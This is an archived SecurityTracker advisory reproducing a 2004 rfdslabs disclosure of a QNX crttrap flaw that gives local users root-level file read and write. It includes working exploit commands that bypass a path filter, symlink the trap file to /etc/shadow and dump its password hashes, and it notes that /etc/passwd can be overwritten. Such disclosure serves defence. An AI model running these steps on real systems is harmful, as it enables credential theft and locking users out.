SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Other)  >   QNX Vendors:   QNX Software Systems Ltd.
QNX crttrap '-c' Lets Local Users Read or Write Arbitrary Files
SecurityTracker Alert ID:  1012712
SecurityTracker URL:  http://securitytracker.com/id/1012712
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 29 2004
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Description:   A vulnerability was reported in the QNX operating system in crttrap. A local user can read and write arbitrary files on the target system.

Julio Cesar Fort from rfdslabs reported that a local user can invoke crttrap with the '-c' command option and the 'trap' flag to write a trap file to an arbitrary location with root privileges.

A demonstration exploit command is provided:

$ crttrap -c tmp/rfdslabs trap

Files can also be overwritten with the 'trap' command line switch.

The vendor was notified on December 11, 2004.

Impact:   A local user can create, read, or overwrite arbitrary files on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.qnx.com/ (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] QNX crrtrap arbitrary file read/write


*** rfdslabs security advisory ***

Title: QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Vendor: http://www.qnx.com
Date: Dec 11 2004

Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>

1. Introduction

crrtrap is a tool to detect video hardware and starts the correct driver for
QNX.

2. Details

crttrap has a '-c' flag to specify where trap file will be written. Combined
with 'trap' flag it is possible to read/write any file in the disk.

By default crttrap writes and read trap files in "/etc/system/config". Once
this directory is owned by root we don't have permission to write. It
filters "../" to prevent directory transversal vulnerabilities. In order to
bypass this protection we noticed it doesn't check only for "/".
This way is possible to make it create a sub directory, giving our group
read and write priviledges. Now we are able to manipulate our trap file.

$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x    2 root 100         2048 Dec 11 12:40 .
drwxrwxr-x    3 root root        2048 Dec 11 12:35 ..
-rw-r--r--    1 root 100        21671 Dec 11 12:40 rfdslabs

$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0

We are also able to overwrite any file with 'trap' switch. As an example, an
attacker can corrupt    '/etc/passwd' and make login attempts fail 
everytime.
See www.rfdslabs.com.br for another file deletion vulnerability in crttrap.

PS: In 31 May 2002, Simon Oullette had found a bug in crttrap '-c' flag in
QNX 4.25. But his exploitation technique won't work with newest versions
because crttrap opens "/etc/system/config" and its sub directories.


3. Solution

No official solution yet. We suggest remove crttrap suid bit until QNX don't
release a patch.

4. Timeline

10 Dec 2004: Vulnerability detected;
11 Dec 2004: Advisory written; rfdslabs contacts QNX;
20 Dec 2004: QNX replies back rfdslabs;
28 Dec 2004: Advisory released to public.

Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV).

www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil


--
Julio Cesar Fort (julio at rfdslabs com br)
Recife, PE, Brasil

www.rfdslabs.com.br - computers, sex, human mind, music and
more.

________________________________________________
Message sent using
UebiMiau 2.7.2

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC